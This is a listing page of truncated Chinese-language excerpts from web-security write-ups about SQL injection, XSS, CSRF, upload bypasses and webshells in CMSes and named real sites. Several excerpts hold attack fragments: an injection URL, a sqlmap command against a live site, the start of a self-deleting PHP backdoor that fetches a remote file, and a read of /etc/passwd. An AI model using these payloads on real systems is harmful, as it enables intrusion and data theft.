action\users\user_ico_cut_save.action.php ?php //引入模块公共方法文件 require(foundation/module_users.php);require(foundation/aintegral.php);require(foundation/fcontent_fo...
由于计划任务功能没有对文件名做任何限制导致只需要把文件上传到/include/crons/目录就可以执行 首先到全局附件设置修改上传目录 然后直接...
pjblog在07年一个民间插件的漏洞。PJ博客编辑器的漏洞,没有过滤敏感字符。目前这个插件作者已经不维护更新了。没使用这个插件的blog不会...
不知道这算不算BUG吧,但我想这一简单的东西,应该会去留意的人都能发现,具体就是新版的吧务后台中查用户的完整IP。 首先,你得是吧...
email:0x007er@gmail.com 说明:本文乃原创,同时也很菜 只是分享出自己一些想法 如有雷同 纯属科学现象 其实是这样的,我们平时经常看到一些...
后台装有通易上传插件,可直接调用上传,利用IIS解析漏洞,获得webshell。 构造关键字:美工及程序设计:金站网通易建站 随便找几个站测试...
看到rsync的这个文章http://www.2cto.com/Article/201307/226273.html, 随便找了一个试试手,还涉及UC_KEY利用,中转脚本等思想。 www.fumu.com ip 210.14.136...
POST /espcms_utf8_5.6.13.04.22_b/upload/index.php?ac=membermainat=save HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0Accept: te...
这是问题页面~ 顺带一个比较糟糕的问题,这里没有设置邮件发送间隔的时间哦,相当于发动技能无cd。 看吧刷屏了,可以做炸弹神马的哦。...
后台的SQL注入,几乎所有的后台功能块都能用此方法注入,进入后台就可以用此提升下自己的权限了,当然,进入后台让这个漏洞鸡肋了,...
作者:Str0ng 团队:www.anying.org 转载请注明,违者必究 原文:http://www.anying.org/thread-40882-1-1.html QQweibo:http://t.qq.com/F4ck_Str0ng 0x00前言 0x01空间类...
QQ空间日志插入XSS让好友打开自己的QQ空间出现弹窗 其实我也不知道这是什么XSS,我也是无意间发现的!好友只要打开自己的QQ空间就会出现...
第一次的漏洞利用程序有个bug 但是因为有这个bug 导致了成功利用了发现的第三处漏洞 第二次漏洞也是并没有用到第二次所提到的漏洞,其...
emlog博客cms系统后台插件管理处存在文件包含,由于是在后台,所以很鸡肋。。 漏洞文件:src/admin/plugin.php 第9行: $plugin = isset($_GET[plugin]) ? ...
汽车的: /include/paygate/alipay/pays.php /* *类名:alipay_notify *功能:付款过程中服务器通知类 *详细:该页面是通知返回核心处理文件,不需要修改...
注入发生在search_result.jsp文件中的docTitle参数 http://xxxxxx.com/yyoa/oaSearch/search_result.jsp?docType=协同信息docTitle=1and/**/1=2/**/union/**/all/**/select/**/us...
咕咚网忘记密码找回功能涉及权限,导致在知道注册邮箱的情况下可以修改任意用户的密码。 第一步,点击忘记密码,会要求输入注册邮箱...
转载请注明:@小五义http://www.cnblogs.com/xiaowuyi 针对版本:DreamMail 4.6.9.2 测试环境:windows xp sp3 python版本:2.6 测试邮箱:126.com #-*- coding:UTF-...
创业团队如何在低成本的情况下保护自己的网站安全?一般来说,很多安全专家都会告诉你没有绝对的安全,如果黑客一定要长期盯着你的公...
我也是初学php 文章有什么不对的 还望各位指出错误 见谅 。。。 ================================================================= /Include/general.inc.php 21-2...
######################################################################### 1 [+] E-Mail : B.Devils.B@gmail.com 1 ## 0 [+] Y! : Doctor.3v1l 0 ## 1 1 ## 0 #############################...
shopex代码核心的地方都做了加密处理,找漏洞就需要一点想象空间了,比如这个SQL注入... 存在于用户注册(想不到的位置吧?) /core/shop/cont...
本来想重置任意用户密码的...万恶的验证码啊... 就拿自己刚注册的账号做测试... 登陆时候直接点忘记密码,来到密码找回页面... http://www...
场景:通过sql注入漏洞读取数据库信息但是不能破解密码的情况下可以绕过后台验证 phpcms数据库中表v9_session保存着管理员登录的信息,而且...
shopex后台登陆地址: http://127.0.0.1/shopadmin/index.php?ctl=passportact=login 分析代码: \core\include_v5\adminCore.php public function adminCore( )......$mod = $_GET[...
晚上闲来无事准备提权前几天拿的shell。无奈shell没有了进后台上传shell发先有狗。aspx不支持。看了一个文章说安全狗截断解析无奈还是被拦...
1、首先找到可能存在问题URL -- 代码: http://so.haodf.com/all.php?fromcode=***type=***q= 以及优化后的新搜索页面http://search.haodf.com/all.php?fromcode=***type...
Details========================程序: Testimonial版本: 2.2类型: Wordpress plugin作者: IndiaNIC缺陷类别:- XSS (CWE-79)- CSRF (CWE-352)- SQL Injection (CWE-89)概述=======...
最近项目被第三方工具扫描出来有一个Http head xss cross scripting漏洞,为了修复这个,顺便研究了一下跨站脚本攻击的原理, 跨站脚本攻击基...
./inc/require/z_other_face_up.php$web[img_name_b] = face-.urlencode($session[0]);//这个是从cookie中获取的,为cookie explode |之后的第一个字符//gmdate(Y...
ctl.product.php class ctl_product extends shopPage{ var $_call = call; var $type = goods; var $seoTag = array(shopname,brand,goods_name,goods_cat,goods_intro,goods_brief,brand_kw,go...
问题站点是联想开发社区:http://developer.lenovomm.com/ 1.注册一个用户,看见有个上传新应用; 2.我就不相信你们一个错误只犯一次,果不其然...
验证设计存在逻辑问题,验证通过的key对没有时间限制。一次正常通过的key对可以无限次通过验证,验证码形同虚设 上述代码为印象码提供...
篇文章是关于我们探索基于Ajax的应用程序在评估过程中遇到的主要安全问题。 AJAX : Ajax或非同步JavaScript和XML是一个相对较新的和动态的...
前段时间我写了个利用插件拿Discuz!论坛shell的文章:http://www.2cto.com/Article/201307/230113.html 很多人说安装插件需要 安全密码 ,其实很早我就发...
dedecms一处注入,较鸡肋,之前变量覆盖的漏洞太轰动了,所以一直没发出,之前5月份最新版本测试的 漏洞需要会员,所以比较鸡肋啦 发表...
第一版的绕过安全密码装插件:http://www.2cto.com/Article/201310/248549.html 第一版后台拿shell:利用插件拿Discuz!论坛shell的文章http://www.2cto.com/Arti...
代码如下: celive/index.php 代码: $_SESSION[thislive] = md5(time()); $_SESSION[thislivetmp] = $_SESSION[thislive]; if ($config[customer_info]) { header(Location: .$config[u...
Discuz!利用插件拿Discuz!论坛shell的文章:http://www.2cto.com/Article/201307/230113.html 拿shell,我在这篇文章里面用到的插件是zend加密的,可能有系统...
=======================标题=====Quick Contact Form - Persistent Cross Site Scripting Vulnerability作者======Zy0d0x开发者======Quick Plugins - http://quick-plugins.com/受影响...
继续 http://www.2cto.com/Article/201310/247722.html 的挖掘 官方demo http://eoffice8.weaver.cn:8028/login.php 测试账号还是那个 xj 存在两个问题: 0x01:任意文件...
出现问题的站点 http://bbs.qrobot.qq.com 在发帖处的flash 里插入构造好的xss代码 http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u00...
PHP 无文件后门的意思是驻在 php 后台中的 shell。 nonshell.php ?phpunlink($_SERVER[SCRIPT_FILENAME]);ignore_user_abort(true);set_time_limit(0);$remote_file = http://xs...
首先给天涯安全工作者普及一下知识。 一.CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/s...
存在问题的站点:http://legc.lenovo.com/ 一.任意用户密码修改 1.注册一个帐号,点击来进行用户密码修改; 2.抓包得到如下数据,发现未进行过...
存在问题的站点:联想开发社区 1.注册两个帐号,信息如下(可根据浏览器区分): 2.通过chrome浏览器调试工具修改其中一个用户信息如下...
存在问题的站点:http://legc.lenovo.com/ 1.上传头像处对过滤不严导致可上传任意文件: 2.好在上传的文件和web应用进行了分离无法直接利用,但...
过滤不完整,存在注入 http://www.yokagames.com/product/product/?id=53 处存在注入漏洞 其实还发现之前有人报过,但是修复仅仅做了简单过滤可绕过...
Namazu来自日本神话,神话中说日本列岛被一条大鲶围绕着,可以引起地震等,这条大鱼就叫Namazu。 日本大学、政府站点中有套常用的程序也...
xss获取管理员COOKIE登陆+巧妙提权思路,通过ashx自动生成文件,虽然最后未提权成功,但希望与各位白帽子相互交流心得,以后遇到此类漏洞...
借爱奇艺某功能挖出网站多处存储型XSS(打遍天下无敌手) STEP1.我们在一个具体的视频页面发起一个投票,标题是XSS代码,具体选项也是...
在调研dedecms的历史漏洞时,发现了dedecms安装文件曾经出过被植入后门的漏洞(SSV-ID站点include目录下shopcar.class.php文件被植入一句话木马)...
dedecms一处注入,较鸡肋,之前变量覆盖的漏洞太轰动了,所以一直没发出,之前5月份最新版本测试的,目前最新版本应该是没修复的 漏洞...
漏洞页面 http://movie.dangdang.com/list/longBestSelling_C05*.01_P1.htm 注入语句: python sqlmap.py -u http://movie.dangdang.com/list/longBestSelling_C05*.01_P1.htm --dbms m...
作者:ice 团队:www.anying.org 转载必须注明。 E-mail:1c30day@gmail.com 经过一天的辛苦劳动下班了,实在无聊,QQ上的基友基本都挂机睡觉了。找点...
照例e文装逼 WordPress Woopra Remote Code Execution:http://www.wordpress-secure.org/index.php/wordpress-woopra-remote-code-execution/ 此漏洞对Woopra 1.4.3.1以上版本无效...
在CSRF攻击流行之初,曾经有一种错误的观点,认为CSRF攻击只能由GET请求发起,因此很多开发者都认为只要把重要的操作改成只允许POST请求...
用一首诗开始我的博文: 那时我们有梦, 关于文学,关于爱情, 关于穿越世界的旅行。 如今我们深夜饮酒, 杯子碰到一起, 都是梦破碎...
一、被盗号找上门 今天一打开QQ邮箱,看到个群邮件 这货以发聚会照片为名义给出了一个网址 http://202.194.131.20/xcb/xcb/link.php?id=73url=http://y...
这次我们来看看如何利用XSS结合CSRF打造定向攻击 再来看一下上次(http://www.2cto.com/Article/201310/248998.html)的文件引发的又一个问题 首先抓包...
这次的例子将结合一个POST的CSRF来实现蠕虫攻击,这次的蠕虫仅仅是利用一个CSRF来传播,如果用XSS(dom操作)来感染,危害更大。 通过发微博...
作为一个稍懂web安全的开发人员,在接触安全的某个阶段被一个问题给迷糊了好久(其实现在也好不了多少),那就是为什么开发人员和安...
http://secaqb.anquanbao.org/exec.php?gp=file_put_contents%0a(seay.php,%22%3C?php%20phpinfo();?%3E%22); %0a插在方法和(之间就绕过了~ 修复方案: 还是正则?...
爆米花网多处XSS(大多储存型) 1.直播间处修改花名,虽然限制了长度,但是没有过滤,如果修改为/script会造成页面错误。 页面错误直接爆出...
WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢? sqlmap的tamper里有个base64encode.py 使用如...
我们在写网站防火墙规则的时候可能都会做一件事:永远不屏蔽那些主流搜索引擎机器人的爬取(如,Google,Bing,Yahoo,Baidu等). 至今,我们觉得这样...
阿里云邮箱邮件正文存在存储型跨站漏洞,可通过在HTML内嵌data uri scheme标记的方式来绕过执行恶意脚本。成功窃取信息可以登陆受攻击者邮...
此方法只试用于V3.1 05837 或小于V3.1 05837 最新版本为 V3.1 06103 ps:此方法已经提交到安全狗安全应急响应中心 绕过网站安全狗 V3.1 06103办法稍...
地址:http://wenku.115.com/index.php?ct=docac=searchkey word= 直接爆出路径了。 修复方案: 过滤keyword参数...
请不要在客户端验证找回密码所用邮箱或手机号 修复方案: 不要相信客户端 服务端验证最靠谱...
多玩网某应用设计缺陷,无验证.导致可以卡任何高于OW权限的灰色马甲,配合另外一个漏洞,可以卡任何ID的马甲.连公会频道创始人(OW)都无法...
好久没写技术博客,最近研究产品关于用户体验方面较多,加上项目突然比较多,设计原型、跟进开发、设计师等工作着实没时间写博客。...
-------------------------------------------------------------------------------------------Vanilla Forums = 2.0.18.5 (class.utilitycontroller.php) PHP Object Injection Vulnerability...
天天动听可以用任意邮箱注册,比如root@qq.com,不要怕密码丢失,你可以结合重置任意密码来让这个作为你的永久账户,虽然收不到邮件。。...
查询的页面出了问题,而且数据库同服且权限较高。可进服务器。数据库可外连,直接秒拖啊!而且所谓的正品防伪码,进服务器之后随便...
到处点点,发现有一台图片服务器nginx/0.8.54 存在解析漏洞 http://tp2.sinaimg.cn/ 但是找不到上传图片的地方,利用不了 再看一下 http://2.eboss.cn/ 首...
flash漏洞导致的xss,可以加粉 无聊,跑到微博游戏那里转转,看网页代码发现是phpwind做的。找了下普通的xss,一无所获。 想起wind有flash的...
拿骑士的演示站做测试。 http://demo.74cms.com/admin 使用 测试 123456 登陆后台。 点击工具页面。 找到百度开放平台。。 点击配置 如下图: 修改...
crossdomain.xml的默认设置: ?xml version=1.0?-cross-domain-policy allow-access-from domain=*/!-- flash跨域策略,domain建议设置为 *.你的站点域名 -- /cross-domai...
webWork是建立在称为XWork的Command模式框架之上的强大的基于Web的MVC框架。 详细见百科:http://baike.baidu.com/view/25660.htm 作为j2ee史上一个重要而强...
1.模板管理处对CurrPath参数过滤不当导致可以遍历上级目录 http://pplms.cn/x/admin/Template/TemplateManage.asp?CurrPath=%2Fx%2F 也可以直接查看文件内容,如...
ASPCMS系统对用户提交的参数过滤不严,导致攻击者可以提交SQL语句查询数据库获取敏感信息。 漏洞存在于/admin_aspcms/_content/_Content/AspCms_Con...
随着php语言的流行,出现了无数的使用php开发的web应用程序,这吸引了大批的攻击者开始寻找,攻击有安全漏洞的php应用程序。 所以,程序...
AiJiaCms的介绍 爱家是目前市场上一家专注于房地产网站开发商,从前期销售到后期维护、更新、技术支持等一条龙式房产解决方案提供商。...
###################################################### #标题: WordPress themekernel-theme Themes Remote File Upload Vulnerability# 作者: iskorpitx# 开发者官网: http://www.w...
ASP.NET 1.1: 打开 C:WINDOWSMicrosoft.NETFrameworkv1.1.4322CONFIGmachine.config 设置: location allowOverride=false identity impersonate=true userName= password=/ ASP.NET 2.0 以...
XSS已经成为非常流行的网站攻击方式,为了安全起见,尽量避免用户的输入。可是有些情况下不仅不避免,反而要求鼓励输入,比如写博客...
最近弄了个广告联盟,好像无需备案即可申请。 点击一个广告6分钱,弹窗一个4.5 毫 (注意不是土豪的豪) 然后产生一系列的想法。 ... ...
chshcms 程氏CMS V3.0 注射(已在官方演示站测试) 图片中演示站为http://www.dj221.com /user/do.php function TOPIC(){ if(isset($_COOKIE[cs_name])){ $cscms_name=$_C...
/common.inc.php 64行: if($_POST) $_POST = strip_sql($_POST); //strip_sql()过滤if($_GET) $_GET = strip_sql($_GET);if($_COOKIE) $_COOKIE = strip_sql($_COOKIE);.........if($_POST)...
十月一的假期间,在知乎上看到一个问题《网页游戏都有哪些安全问题?》,我是一个网页游戏开发者,对这个问题非常感兴趣,印象比较...
分析目标 XDcms订餐网站系统 v1.0 XDcms订餐网站管理系统,主要使用Php+Mysql+Smarty技术基础进行开发,采用OOP(面向对象)方式进行基础运行框...
利用之前一个小缺陷可实现以下3个方面的利用 #~1可修改他人账号密码并成功登陆~ #~2可获取58内部领导手机号~ #~3对获取的58内部领导手机号...
(并非密码修改漏洞,是直接进入任意帐号)(密码明文储存 不光可以进入帐号 还可以直接获取用户明文密码!!!) 引用七楼的话:据...
第一个: Discuz! X3 个人空间 -- 装扮空间处 开始 自定义 文字颜色处 构造语句exp/**/ressi/**/on:alert(document.cookie) IE 下触发 ,目前测试浏览器 ...
...
用google批量找反射xss。。。。。。。。其实吧。。我本来想找json劫持的。。。。 详细说明: 用google搜一下。。。。。site:youku.com inurl:call...
dede的漏洞公认的多,接手这个网站也接触了不少,现在就把几种接触到的或者了解到的漏洞记录下来,让大家可以提高警惕,防止网站被攻...
sms.php中对于手机号码未过滤即代入查询,造成SQL注入 if($_REQUEST[act]==subscribe){$tmpl-display(sms_subscribe.html);}elseif($_REQUEST[act]==do_subscribe){//开始发...
这个漏洞已经公布了,在公司做的漏洞分析,随便就分享下这个文档。 漏洞作者blue,漏洞请看:http://www.2cto.com/Article/201309/241275.html 部分代码...
上传漏洞,无需后台权限直接上传,无过滤,导致文件非法上传! 早晨刚上QQ,就有提示信箱收到个邮件,推广代码的,看了下主站,SKCM...
SDCMS邮件绑定csrf可劫持账户 1、在SDCMS的邮件绑定处,未作任何防御,导致csrf poc: htmlbodyform id=xfkxfk name=xfkxfk action=http://localhost/sdcms/user/em...
晚上设计一个小网站的时候用字体管家在线预览字体,手贱测试了一下。构造XSS中的脚本构造恶意下载连接即可永久性造成本地任意代码执...
上一篇: http://www.2cto.com/Article/201309/241597.html 1.读写文件 方法1. 适用于可以多语句执行时 读取 CREATE TABLE read(t TEXT);COPY read FROM /etc/passwd;SEL...
通过自己的手机获取验证码 抓包进行修改 改为自己想要修改密码的手机号码 OK,修改密码成功 是否真正成功呢? 登陆看看 OK 的确改了...
Core Security - Corelabs Advisoryhttp://corelabs.coresecurity.com/Sophos Web Protection Appliance Multiple Vulnerabilities1. *Advisory Information*Title: Sophos Web Protection Appli...
任意上传,修改文件名可绕过 上传提示 绕过后。 修改文件名xx.asp;.jpg 成功上传。 如果遇到IIS6 解析漏洞 可以直接访问。 如果没有IIS6漏洞...
笔者前日无聊,看到公司附近某个服务行业机构的网站,asp语言,搭建于iis服务器中。一开始笔者并没有留意到这网站有sql注入漏洞,随手...
漏洞的危害其实是因需求而异,对于一次精心的渗透而言或许一个反射xss就够了.没被干过的厂商也不懂那份痛了. 1.jpg poc1:INPUT SRC=javascri...
作者:blackwidow7 团队:www.anying.org(暗影技术) 转载请注明作者和团队,违者必究。 目标www.xxx.com 主站看了下,发现了目录遍历但是下载不下...